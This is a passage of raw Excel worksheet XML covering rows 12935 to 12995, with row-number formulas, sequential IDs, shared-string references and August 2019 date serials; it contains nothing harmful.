      </c>
      <c r="B12935">
        <v>2934</v>
      </c>
      <c r="C12935" t="s">
        <v>19637</v>
      </c>
      <c r="D12935" s="1">
        <v>43678</v>
      </c>
      <c r="E12935" t="s">
        <v>19640</v>
      </c>
      <c r="F12935" t="s">
        <v>9975</v>
      </c>
      <c r="G12935" t="s">
        <v>23206</v>
      </c>
    </row>
    <row r="12936" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12936">
        <f t="shared" si="202"/>
        <v>12935</v>
      </c>
      <c r="B12936">
        <v>2935</v>
      </c>
      <c r="C12936" t="s">
        <v>19637</v>
      </c>
      <c r="D12936" s="1">
        <v>43687</v>
      </c>
      <c r="E12936" t="s">
        <v>23207</v>
      </c>
      <c r="F12936" t="s">
        <v>10526</v>
      </c>
      <c r="G12936" t="s">
        <v>23208</v>
      </c>
    </row>
    <row r="12937" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12937">
        <f t="shared" si="202"/>
        <v>12936</v>
      </c>
      <c r="B12937">
        <v>2936</v>
      </c>
      <c r="C12937" t="s">
        <v>19637</v>
      </c>
      <c r="D12937" s="1">
        <v>43700</v>
      </c>
      <c r="E12937" t="s">
        <v>19695</v>
      </c>
      <c r="F12937" t="s">
        <v>9975</v>
      </c>
      <c r="G12937" t="s">
        <v>23209</v>
      </c>
    </row>
    <row r="12938" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12938">
        <f t="shared" si="202"/>
        <v>12937</v>
      </c>
      <c r="B12938">
        <v>2937</v>
      </c>
      <c r="C12938" t="s">
        <v>19637</v>
      </c>
      <c r="D12938" s="1">
        <v>43679</v>
      </c>
      <c r="E12938" t="s">
        <v>19982</v>
      </c>
      <c r="F12938" t="s">
        <v>9978</v>
      </c>
      <c r="G12938" t="s">
        <v>23210</v>
      </c>
    </row>
    <row r="12939" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12939">
        <f t="shared" si="202"/>
        <v>12938</v>
      </c>
      <c r="B12939">
        <v>2938</v>
      </c>
      <c r="C12939" t="s">
        <v>19637</v>
      </c>
      <c r="D12939" s="1">
        <v>43698</v>
      </c>
      <c r="E12939" t="s">
        <v>19705</v>
      </c>
      <c r="F12939" t="s">
        <v>10021</v>
      </c>
      <c r="G12939" t="s">
        <v>23211</v>
      </c>
    </row>
    <row r="12940" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12940">
        <f t="shared" si="202"/>
        <v>12939</v>
      </c>
      <c r="B12940">
        <v>2939</v>
      </c>
      <c r="C12940" t="s">
        <v>19637</v>
      </c>
      <c r="D12940" s="1">
        <v>43690</v>
      </c>
      <c r="E12940" t="s">
        <v>23212</v>
      </c>
      <c r="F12940" t="s">
        <v>10526</v>
      </c>
      <c r="G12940" t="s">
        <v>23213</v>
      </c>
    </row>
    <row r="12941" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12941">
        <f t="shared" si="202"/>
        <v>12940</v>
      </c>
      <c r="B12941">
        <v>2940</v>
      </c>
      <c r="C12941" t="s">
        <v>19637</v>
      </c>
      <c r="D12941" s="1">
        <v>43704</v>
      </c>
      <c r="E12941" t="s">
        <v>19974</v>
      </c>
      <c r="F12941" t="s">
        <v>9978</v>
      </c>
      <c r="G12941" t="s">
        <v>23214</v>
      </c>
    </row>
    <row r="12942" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12942">
        <f t="shared" si="202"/>
        <v>12941</v>
      </c>
      <c r="B12942">
        <v>2941</v>
      </c>
      <c r="C12942" t="s">
        <v>19637</v>
      </c>
      <c r="D12942" s="1">
        <v>43705</v>
      </c>
      <c r="E12942" t="s">
        <v>19750</v>
      </c>
      <c r="F12942" t="s">
        <v>9978</v>
      </c>
      <c r="G12942" t="s">
        <v>23215</v>
      </c>
    </row>
    <row r="12943" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12943">
        <f t="shared" si="202"/>
        <v>12942</v>
      </c>
      <c r="B12943">
        <v>2942</v>
      </c>
      <c r="C12943" t="s">
        <v>19637</v>
      </c>
      <c r="D12943" s="1">
        <v>43692</v>
      </c>
      <c r="E12943" t="s">
        <v>22546</v>
      </c>
      <c r="F12943" t="s">
        <v>9975</v>
      </c>
      <c r="G12943" t="s">
        <v>23216</v>
      </c>
    </row>
    <row r="12944" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12944">
        <f t="shared" si="202"/>
        <v>12943</v>
      </c>
      <c r="B12944">
        <v>2943</v>
      </c>
      <c r="C12944" t="s">
        <v>19637</v>
      </c>
      <c r="D12944" s="1">
        <v>43703</v>
      </c>
      <c r="E12944" t="s">
        <v>19785</v>
      </c>
      <c r="F12944" t="s">
        <v>9975</v>
      </c>
      <c r="G12944" t="s">
        <v>23217</v>
      </c>
    </row>
    <row r="12945" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12945">
        <f t="shared" si="202"/>
        <v>12944</v>
      </c>
      <c r="B12945">
        <v>2944</v>
      </c>
      <c r="C12945" t="s">
        <v>19637</v>
      </c>
      <c r="D12945" s="1">
        <v>43678</v>
      </c>
      <c r="E12945" t="s">
        <v>21292</v>
      </c>
      <c r="F12945" t="s">
        <v>10526</v>
      </c>
      <c r="G12945" t="s">
        <v>23218</v>
      </c>
    </row>
    <row r="12946" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12946">
        <f t="shared" si="202"/>
        <v>12945</v>
      </c>
      <c r="B12946">
        <v>2945</v>
      </c>
      <c r="C12946" t="s">
        <v>19637</v>
      </c>
      <c r="D12946" s="1">
        <v>43680</v>
      </c>
      <c r="E12946" t="s">
        <v>19648</v>
      </c>
      <c r="F12946" t="s">
        <v>10021</v>
      </c>
      <c r="G12946" t="s">
        <v>23219</v>
      </c>
    </row>
    <row r="12947" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12947">
        <f t="shared" si="202"/>
        <v>12946</v>
      </c>
      <c r="B12947">
        <v>2946</v>
      </c>
      <c r="C12947" t="s">
        <v>19637</v>
      </c>
      <c r="D12947" s="1">
        <v>43699</v>
      </c>
      <c r="E12947" t="s">
        <v>23220</v>
      </c>
      <c r="F12947" t="s">
        <v>9975</v>
      </c>
      <c r="G12947" t="s">
        <v>23221</v>
      </c>
    </row>
    <row r="12948" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12948">
        <f t="shared" si="202"/>
        <v>12947</v>
      </c>
      <c r="B12948">
        <v>2947</v>
      </c>
      <c r="C12948" t="s">
        <v>19637</v>
      </c>
      <c r="D12948" s="1">
        <v>43703</v>
      </c>
      <c r="E12948" t="s">
        <v>20767</v>
      </c>
      <c r="F12948" t="s">
        <v>10021</v>
      </c>
      <c r="G12948" t="s">
        <v>23222</v>
      </c>
    </row>
    <row r="12949" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12949">
        <f t="shared" si="202"/>
        <v>12948</v>
      </c>
      <c r="B12949">
        <v>2948</v>
      </c>
      <c r="C12949" t="s">
        <v>19637</v>
      </c>
      <c r="D12949" s="1">
        <v>43695</v>
      </c>
      <c r="E12949" t="s">
        <v>21431</v>
      </c>
      <c r="F12949" t="s">
        <v>10021</v>
      </c>
      <c r="G12949" t="s">
        <v>23223</v>
      </c>
    </row>
    <row r="12950" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12950">
        <f t="shared" si="202"/>
        <v>12949</v>
      </c>
      <c r="B12950">
        <v>2949</v>
      </c>
      <c r="C12950" t="s">
        <v>19637</v>
      </c>
      <c r="D12950" s="1">
        <v>43687</v>
      </c>
      <c r="E12950" t="s">
        <v>23224</v>
      </c>
      <c r="F12950" t="s">
        <v>10526</v>
      </c>
      <c r="G12950" t="s">
        <v>23225</v>
      </c>
    </row>
    <row r="12951" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12951">
        <f t="shared" si="202"/>
        <v>12950</v>
      </c>
      <c r="B12951">
        <v>2950</v>
      </c>
      <c r="C12951" t="s">
        <v>19637</v>
      </c>
      <c r="D12951" s="1">
        <v>43687</v>
      </c>
      <c r="F12951" t="s">
        <v>10526</v>
      </c>
      <c r="G12951" t="s">
        <v>23226</v>
      </c>
    </row>
    <row r="12952" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12952">
        <f t="shared" si="202"/>
        <v>12951</v>
      </c>
      <c r="B12952">
        <v>2951</v>
      </c>
      <c r="C12952" t="s">
        <v>19637</v>
      </c>
      <c r="D12952" s="1">
        <v>43699</v>
      </c>
      <c r="E12952" t="s">
        <v>20160</v>
      </c>
      <c r="F12952" t="s">
        <v>10526</v>
      </c>
      <c r="G12952" t="s">
        <v>23227</v>
      </c>
    </row>
    <row r="12953" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12953">
        <f t="shared" si="202"/>
        <v>12952</v>
      </c>
      <c r="B12953">
        <v>2952</v>
      </c>
      <c r="C12953" t="s">
        <v>19637</v>
      </c>
      <c r="D12953" s="1">
        <v>43697</v>
      </c>
      <c r="E12953" t="s">
        <v>19640</v>
      </c>
      <c r="F12953" t="s">
        <v>10021</v>
      </c>
      <c r="G12953" t="s">
        <v>23228</v>
      </c>
    </row>
    <row r="12954" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12954">
        <f t="shared" si="202"/>
        <v>12953</v>
      </c>
      <c r="B12954">
        <v>2953</v>
      </c>
      <c r="C12954" t="s">
        <v>19637</v>
      </c>
      <c r="D12954" s="1">
        <v>43680</v>
      </c>
      <c r="E12954" t="s">
        <v>19640</v>
      </c>
      <c r="F12954" t="s">
        <v>9975</v>
      </c>
      <c r="G12954" t="s">
        <v>23229</v>
      </c>
    </row>
    <row r="12955" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12955">
        <f t="shared" si="202"/>
        <v>12954</v>
      </c>
      <c r="B12955">
        <v>2954</v>
      </c>
      <c r="C12955" t="s">
        <v>19637</v>
      </c>
      <c r="D12955" s="1">
        <v>43707</v>
      </c>
      <c r="E12955" t="s">
        <v>19638</v>
      </c>
      <c r="F12955" t="s">
        <v>10021</v>
      </c>
      <c r="G12955" t="s">
        <v>23230</v>
      </c>
    </row>
    <row r="12956" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12956">
        <f t="shared" si="202"/>
        <v>12955</v>
      </c>
      <c r="B12956">
        <v>2955</v>
      </c>
      <c r="C12956" t="s">
        <v>19637</v>
      </c>
      <c r="D12956" s="1">
        <v>43690</v>
      </c>
      <c r="E12956" t="s">
        <v>21389</v>
      </c>
      <c r="F12956" t="s">
        <v>9975</v>
      </c>
      <c r="G12956" t="s">
        <v>23231</v>
      </c>
    </row>
    <row r="12957" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12957">
        <f t="shared" si="202"/>
        <v>12956</v>
      </c>
      <c r="B12957">
        <v>2956</v>
      </c>
      <c r="C12957" t="s">
        <v>19637</v>
      </c>
      <c r="D12957" s="1">
        <v>43681</v>
      </c>
      <c r="E12957" t="s">
        <v>19830</v>
      </c>
      <c r="F12957" t="s">
        <v>10526</v>
      </c>
      <c r="G12957" t="s">
        <v>23232</v>
      </c>
    </row>
    <row r="12958" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12958">
        <f t="shared" si="202"/>
        <v>12957</v>
      </c>
      <c r="B12958">
        <v>2957</v>
      </c>
      <c r="C12958" t="s">
        <v>19637</v>
      </c>
      <c r="D12958" s="1">
        <v>43697</v>
      </c>
      <c r="E12958" t="s">
        <v>19896</v>
      </c>
      <c r="F12958" t="s">
        <v>10021</v>
      </c>
      <c r="G12958" t="s">
        <v>23233</v>
      </c>
    </row>
    <row r="12959" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12959">
        <f t="shared" si="202"/>
        <v>12958</v>
      </c>
      <c r="B12959">
        <v>2958</v>
      </c>
      <c r="C12959" t="s">
        <v>19637</v>
      </c>
      <c r="D12959" s="1">
        <v>43678</v>
      </c>
      <c r="E12959" t="s">
        <v>19640</v>
      </c>
      <c r="F12959" t="s">
        <v>10021</v>
      </c>
      <c r="G12959" t="s">
        <v>23234</v>
      </c>
    </row>
    <row r="12960" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12960">
        <f t="shared" si="202"/>
        <v>12959</v>
      </c>
      <c r="B12960">
        <v>2959</v>
      </c>
      <c r="C12960" t="s">
        <v>19637</v>
      </c>
      <c r="D12960" s="1">
        <v>43705</v>
      </c>
      <c r="E12960" t="s">
        <v>19650</v>
      </c>
      <c r="F12960" t="s">
        <v>10021</v>
      </c>
      <c r="G12960" t="s">
        <v>23235</v>
      </c>
    </row>
    <row r="12961" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12961">
        <f t="shared" si="202"/>
        <v>12960</v>
      </c>
      <c r="B12961">
        <v>2960</v>
      </c>
      <c r="C12961" t="s">
        <v>19637</v>
      </c>
      <c r="D12961" s="1">
        <v>43682</v>
      </c>
      <c r="E12961" t="s">
        <v>19648</v>
      </c>
      <c r="F12961" t="s">
        <v>10021</v>
      </c>
      <c r="G12961" t="s">
        <v>23236</v>
      </c>
    </row>
    <row r="12962" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12962">
        <f t="shared" si="202"/>
        <v>12961</v>
      </c>
      <c r="B12962">
        <v>2961</v>
      </c>
      <c r="C12962" t="s">
        <v>19637</v>
      </c>
      <c r="D12962" s="1">
        <v>43677</v>
      </c>
      <c r="F12962" t="s">
        <v>10526</v>
      </c>
      <c r="G12962" t="s">
        <v>23237</v>
      </c>
    </row>
    <row r="12963" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12963">
        <f t="shared" si="202"/>
        <v>12962</v>
      </c>
      <c r="B12963">
        <v>2962</v>
      </c>
      <c r="C12963" t="s">
        <v>19637</v>
      </c>
      <c r="D12963" s="1">
        <v>43692</v>
      </c>
      <c r="E12963" t="s">
        <v>21785</v>
      </c>
      <c r="F12963" t="s">
        <v>10021</v>
      </c>
      <c r="G12963" t="s">
        <v>23238</v>
      </c>
    </row>
    <row r="12964" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12964">
        <f t="shared" si="202"/>
        <v>12963</v>
      </c>
      <c r="B12964">
        <v>2963</v>
      </c>
      <c r="C12964" t="s">
        <v>19637</v>
      </c>
      <c r="D12964" s="1">
        <v>43695</v>
      </c>
      <c r="E12964" t="s">
        <v>23239</v>
      </c>
      <c r="F12964" t="s">
        <v>10526</v>
      </c>
      <c r="G12964" t="s">
        <v>23240</v>
      </c>
    </row>
    <row r="12965" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12965">
        <f t="shared" si="202"/>
        <v>12964</v>
      </c>
      <c r="B12965">
        <v>2964</v>
      </c>
      <c r="C12965" t="s">
        <v>19637</v>
      </c>
      <c r="D12965" s="1">
        <v>43692</v>
      </c>
      <c r="E12965" t="s">
        <v>20160</v>
      </c>
      <c r="F12965" t="s">
        <v>10526</v>
      </c>
      <c r="G12965" t="s">
        <v>23241</v>
      </c>
    </row>
    <row r="12966" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12966">
        <f t="shared" si="202"/>
        <v>12965</v>
      </c>
      <c r="B12966">
        <v>2965</v>
      </c>
      <c r="C12966" t="s">
        <v>19637</v>
      </c>
      <c r="D12966" s="1">
        <v>43701</v>
      </c>
      <c r="E12966" t="s">
        <v>19638</v>
      </c>
      <c r="F12966" t="s">
        <v>10021</v>
      </c>
      <c r="G12966" t="s">
        <v>23242</v>
      </c>
    </row>
    <row r="12967" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12967">
        <f t="shared" si="202"/>
        <v>12966</v>
      </c>
      <c r="B12967">
        <v>2966</v>
      </c>
      <c r="C12967" t="s">
        <v>19637</v>
      </c>
      <c r="D12967" s="1">
        <v>43686</v>
      </c>
      <c r="E12967" t="s">
        <v>19638</v>
      </c>
      <c r="F12967" t="s">
        <v>10021</v>
      </c>
      <c r="G12967" t="s">
        <v>23243</v>
      </c>
    </row>
    <row r="12968" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12968">
        <f t="shared" si="202"/>
        <v>12967</v>
      </c>
      <c r="B12968">
        <v>2967</v>
      </c>
      <c r="C12968" t="s">
        <v>19637</v>
      </c>
      <c r="D12968" s="1">
        <v>43685</v>
      </c>
      <c r="E12968" t="s">
        <v>19982</v>
      </c>
      <c r="F12968" t="s">
        <v>9978</v>
      </c>
      <c r="G12968" t="s">
        <v>23244</v>
      </c>
    </row>
    <row r="12969" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12969">
        <f t="shared" si="202"/>
        <v>12968</v>
      </c>
      <c r="B12969">
        <v>2968</v>
      </c>
      <c r="C12969" t="s">
        <v>19637</v>
      </c>
      <c r="D12969" s="1">
        <v>43679</v>
      </c>
      <c r="E12969" t="s">
        <v>19822</v>
      </c>
      <c r="F12969" t="s">
        <v>10526</v>
      </c>
      <c r="G12969" t="s">
        <v>23245</v>
      </c>
    </row>
    <row r="12970" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12970">
        <f t="shared" si="202"/>
        <v>12969</v>
      </c>
      <c r="B12970">
        <v>2969</v>
      </c>
      <c r="C12970" t="s">
        <v>19637</v>
      </c>
      <c r="D12970" s="1">
        <v>43703</v>
      </c>
      <c r="E12970" t="s">
        <v>23003</v>
      </c>
      <c r="F12970" t="s">
        <v>10526</v>
      </c>
      <c r="G12970" t="s">
        <v>23246</v>
      </c>
    </row>
    <row r="12971" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12971">
        <f t="shared" si="202"/>
        <v>12970</v>
      </c>
      <c r="B12971">
        <v>2970</v>
      </c>
      <c r="C12971" t="s">
        <v>19637</v>
      </c>
      <c r="D12971" s="1">
        <v>43697</v>
      </c>
      <c r="E12971" t="s">
        <v>19945</v>
      </c>
      <c r="F12971" t="s">
        <v>10526</v>
      </c>
      <c r="G12971" t="s">
        <v>23247</v>
      </c>
    </row>
    <row r="12972" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12972">
        <f t="shared" si="202"/>
        <v>12971</v>
      </c>
      <c r="B12972">
        <v>2971</v>
      </c>
      <c r="C12972" t="s">
        <v>19637</v>
      </c>
      <c r="D12972" s="1">
        <v>43694</v>
      </c>
      <c r="E12972" t="s">
        <v>19672</v>
      </c>
      <c r="F12972" t="s">
        <v>10021</v>
      </c>
      <c r="G12972" t="s">
        <v>23248</v>
      </c>
    </row>
    <row r="12973" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12973">
        <f t="shared" si="202"/>
        <v>12972</v>
      </c>
      <c r="B12973">
        <v>2972</v>
      </c>
      <c r="C12973" t="s">
        <v>19637</v>
      </c>
      <c r="D12973" s="1">
        <v>43693</v>
      </c>
      <c r="E12973" t="s">
        <v>19705</v>
      </c>
      <c r="F12973" t="s">
        <v>10021</v>
      </c>
      <c r="G12973" t="s">
        <v>23249</v>
      </c>
    </row>
    <row r="12974" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12974">
        <f t="shared" si="202"/>
        <v>12973</v>
      </c>
      <c r="B12974">
        <v>2973</v>
      </c>
      <c r="C12974" t="s">
        <v>19637</v>
      </c>
      <c r="D12974" s="1">
        <v>43695</v>
      </c>
      <c r="F12974" t="s">
        <v>10526</v>
      </c>
      <c r="G12974" t="s">
        <v>23250</v>
      </c>
    </row>
    <row r="12975" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12975">
        <f t="shared" si="202"/>
        <v>12974</v>
      </c>
      <c r="B12975">
        <v>2974</v>
      </c>
      <c r="C12975" t="s">
        <v>19637</v>
      </c>
      <c r="D12975" s="1">
        <v>43688</v>
      </c>
      <c r="E12975" t="s">
        <v>19640</v>
      </c>
      <c r="F12975" t="s">
        <v>10021</v>
      </c>
      <c r="G12975" t="s">
        <v>23251</v>
      </c>
    </row>
    <row r="12976" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12976">
        <f t="shared" si="202"/>
        <v>12975</v>
      </c>
      <c r="B12976">
        <v>2975</v>
      </c>
      <c r="C12976" t="s">
        <v>19637</v>
      </c>
      <c r="D12976" s="1">
        <v>43696</v>
      </c>
      <c r="E12976" t="s">
        <v>19680</v>
      </c>
      <c r="F12976" t="s">
        <v>10021</v>
      </c>
      <c r="G12976" t="s">
        <v>23252</v>
      </c>
    </row>
    <row r="12977" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12977">
        <f t="shared" si="202"/>
        <v>12976</v>
      </c>
      <c r="B12977">
        <v>2976</v>
      </c>
      <c r="C12977" t="s">
        <v>19637</v>
      </c>
      <c r="D12977" s="1">
        <v>43697</v>
      </c>
      <c r="E12977" t="s">
        <v>23253</v>
      </c>
      <c r="F12977" t="s">
        <v>10021</v>
      </c>
      <c r="G12977" t="s">
        <v>23254</v>
      </c>
    </row>
    <row r="12978" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12978">
        <f t="shared" si="202"/>
        <v>12977</v>
      </c>
      <c r="B12978">
        <v>2977</v>
      </c>
      <c r="C12978" t="s">
        <v>19637</v>
      </c>
      <c r="D12978" s="1">
        <v>43708</v>
      </c>
      <c r="E12978" t="s">
        <v>19640</v>
      </c>
      <c r="F12978" t="s">
        <v>9975</v>
      </c>
      <c r="G12978" t="s">
        <v>23255</v>
      </c>
    </row>
    <row r="12979" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12979">
        <f t="shared" si="202"/>
        <v>12978</v>
      </c>
      <c r="B12979">
        <v>2978</v>
      </c>
      <c r="C12979" t="s">
        <v>19637</v>
      </c>
      <c r="D12979" s="1">
        <v>43691</v>
      </c>
      <c r="E12979" t="s">
        <v>19640</v>
      </c>
      <c r="F12979" t="s">
        <v>9975</v>
      </c>
      <c r="G12979" t="s">
        <v>23256</v>
      </c>
    </row>
    <row r="12980" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12980">
        <f t="shared" si="202"/>
        <v>12979</v>
      </c>
      <c r="B12980">
        <v>2979</v>
      </c>
      <c r="C12980" t="s">
        <v>19637</v>
      </c>
      <c r="D12980" s="1">
        <v>43707</v>
      </c>
      <c r="E12980" t="s">
        <v>19648</v>
      </c>
      <c r="F12980" t="s">
        <v>10021</v>
      </c>
      <c r="G12980" t="s">
        <v>23257</v>
      </c>
    </row>
    <row r="12981" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12981">
        <f t="shared" si="202"/>
        <v>12980</v>
      </c>
      <c r="B12981">
        <v>2980</v>
      </c>
      <c r="C12981" t="s">
        <v>19637</v>
      </c>
      <c r="D12981" s="1">
        <v>43698</v>
      </c>
      <c r="E12981" t="s">
        <v>19843</v>
      </c>
      <c r="F12981" t="s">
        <v>10526</v>
      </c>
      <c r="G12981" t="s">
        <v>23258</v>
      </c>
    </row>
    <row r="12982" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12982">
        <f t="shared" si="202"/>
        <v>12981</v>
      </c>
      <c r="B12982">
        <v>2981</v>
      </c>
      <c r="C12982" t="s">
        <v>19637</v>
      </c>
      <c r="D12982" s="1">
        <v>43690</v>
      </c>
      <c r="F12982" t="s">
        <v>10021</v>
      </c>
      <c r="G12982" t="s">
        <v>23259</v>
      </c>
    </row>
    <row r="12983" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12983">
        <f t="shared" si="202"/>
        <v>12982</v>
      </c>
      <c r="B12983">
        <v>2982</v>
      </c>
      <c r="C12983" t="s">
        <v>19637</v>
      </c>
      <c r="D12983" s="1">
        <v>43678</v>
      </c>
      <c r="E12983" t="s">
        <v>19640</v>
      </c>
      <c r="F12983" t="s">
        <v>10526</v>
      </c>
      <c r="G12983" t="s">
        <v>23260</v>
      </c>
    </row>
    <row r="12984" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12984">
        <f t="shared" si="202"/>
        <v>12983</v>
      </c>
      <c r="B12984">
        <v>2983</v>
      </c>
      <c r="C12984" t="s">
        <v>19637</v>
      </c>
      <c r="D12984" s="1">
        <v>43681</v>
      </c>
      <c r="E12984" t="s">
        <v>19687</v>
      </c>
      <c r="F12984" t="s">
        <v>10021</v>
      </c>
      <c r="G12984" t="s">
        <v>23261</v>
      </c>
    </row>
    <row r="12985" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12985">
        <f t="shared" si="202"/>
        <v>12984</v>
      </c>
      <c r="B12985">
        <v>2984</v>
      </c>
      <c r="C12985" t="s">
        <v>19637</v>
      </c>
      <c r="D12985" s="1">
        <v>43691</v>
      </c>
      <c r="E12985" t="s">
        <v>20185</v>
      </c>
      <c r="F12985" t="s">
        <v>9975</v>
      </c>
      <c r="G12985" t="s">
        <v>23262</v>
      </c>
    </row>
    <row r="12986" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12986">
        <f t="shared" si="202"/>
        <v>12985</v>
      </c>
      <c r="B12986">
        <v>2985</v>
      </c>
      <c r="C12986" t="s">
        <v>19637</v>
      </c>
      <c r="D12986" s="1">
        <v>43692</v>
      </c>
      <c r="F12986" t="s">
        <v>10526</v>
      </c>
      <c r="G12986" t="s">
        <v>23263</v>
      </c>
    </row>
    <row r="12987" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12987">
        <f t="shared" si="202"/>
        <v>12986</v>
      </c>
      <c r="B12987">
        <v>2986</v>
      </c>
      <c r="C12987" t="s">
        <v>19637</v>
      </c>
      <c r="D12987" s="1">
        <v>43678</v>
      </c>
      <c r="F12987" t="s">
        <v>10526</v>
      </c>
      <c r="G12987" t="s">
        <v>23264</v>
      </c>
    </row>
    <row r="12988" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12988">
        <f t="shared" si="202"/>
        <v>12987</v>
      </c>
      <c r="B12988">
        <v>2987</v>
      </c>
      <c r="C12988" t="s">
        <v>19637</v>
      </c>
      <c r="D12988" s="1">
        <v>43699</v>
      </c>
      <c r="E12988" t="s">
        <v>19648</v>
      </c>
      <c r="F12988" t="s">
        <v>10021</v>
      </c>
      <c r="G12988" t="s">
        <v>23265</v>
      </c>
    </row>
    <row r="12989" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12989">
        <f t="shared" si="202"/>
        <v>12988</v>
      </c>
      <c r="B12989">
        <v>2988</v>
      </c>
      <c r="C12989" t="s">
        <v>19637</v>
      </c>
      <c r="D12989" s="1">
        <v>43699</v>
      </c>
      <c r="E12989" t="s">
        <v>19640</v>
      </c>
      <c r="F12989" t="s">
        <v>10021</v>
      </c>
      <c r="G12989" t="s">
        <v>23266</v>
      </c>
    </row>
    <row r="12990" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12990">
        <f t="shared" si="202"/>
        <v>12989</v>
      </c>
      <c r="B12990">
        <v>2989</v>
      </c>
      <c r="C12990" t="s">
        <v>19637</v>
      </c>
      <c r="D12990" s="1">
        <v>43707</v>
      </c>
      <c r="E12990" t="s">
        <v>19717</v>
      </c>
      <c r="F12990" t="s">
        <v>10526</v>
      </c>
      <c r="G12990" t="s">
        <v>23267</v>
      </c>
    </row>
    <row r="12991" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12991">
        <f t="shared" si="202"/>
        <v>12990</v>
      </c>
      <c r="B12991">
        <v>2990</v>
      </c>
      <c r="C12991" t="s">
        <v>19637</v>
      </c>
      <c r="D12991" s="1">
        <v>43698</v>
      </c>
      <c r="E12991" t="s">
        <v>19650</v>
      </c>
      <c r="F12991" t="s">
        <v>10021</v>
      </c>
      <c r="G12991" t="s">
        <v>23268</v>
      </c>
    </row>
    <row r="12992" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12992">
        <f t="shared" si="202"/>
        <v>12991</v>
      </c>
      <c r="B12992">
        <v>2991</v>
      </c>
      <c r="C12992" t="s">
        <v>19637</v>
      </c>
      <c r="D12992" s="1">
        <v>43681</v>
      </c>
      <c r="E12992" t="s">
        <v>22488</v>
      </c>
      <c r="F12992" t="s">
        <v>10526</v>
      </c>
      <c r="G12992" t="s">
        <v>23269</v>
      </c>
    </row>
    <row r="12993" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12993">
        <f t="shared" si="202"/>
        <v>12992</v>
      </c>
      <c r="B12993">
        <v>2992</v>
      </c>
      <c r="C12993" t="s">
        <v>19637</v>
      </c>
      <c r="D12993" s="1">
        <v>43682</v>
      </c>
      <c r="E12993" t="s">
        <v>19648</v>
      </c>
      <c r="F12993" t="s">
        <v>10021</v>
      </c>
      <c r="G12993" t="s">
        <v>23270</v>
      </c>
    </row>
    <row r="12994" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12994">
        <f t="shared" si="202"/>
        <v>12993</v>
      </c>
      <c r="B12994">
        <v>2993</v>
      </c>
      <c r="C12994" t="s">
        <v>19637</v>
      </c>
      <c r="D12994" s="1">
        <v>43700</v>
      </c>
      <c r="E12994" t="s">
        <v>20312</v>
      </c>
      <c r="F12994" t="s">
        <v>10526</v>
      </c>
      <c r="G12994" t="s">
        <v>23271</v>
      </c>
    </row>
    <row r="12995" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12995">
        <f t="shared" ref="A12995:A13058" si="203">+ROW(A12994)</f>
        <v>12994</v>
      </c>
      <c r="B12995">
        <v>2994</v>
      </c>
      <c r="C12995" t="s">
        <v>19637</v>
      </c>
      <c r="D12995" s="1">
        <v>43701</v>
      </c>
      <c r="E12995" t="s">
        <v>19640</v>
      </c>
      <c r="F12995" t="s">
        <v>10021</v>
      </c>
      <c r="G12995" t="s">
        <v>20506</v>
      </c>
    </row>
    <row r="12996" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12996">
        <f t="shared" si="203"/>
        <v>12995</v>
      </c>
      <c r="B12996">
        <v>2995</v>
      </c>
      <c r="C12996" t="s">
        <v>19637</v>
      </c>
      <c r="D12996" s="1">
        <v>43703</v>
      </c>
      <c r="F12996" t="s">
        <v>10526</v>
      </c>
      <c r="G12996" t="s">
        <v>23272</v>
      </c>
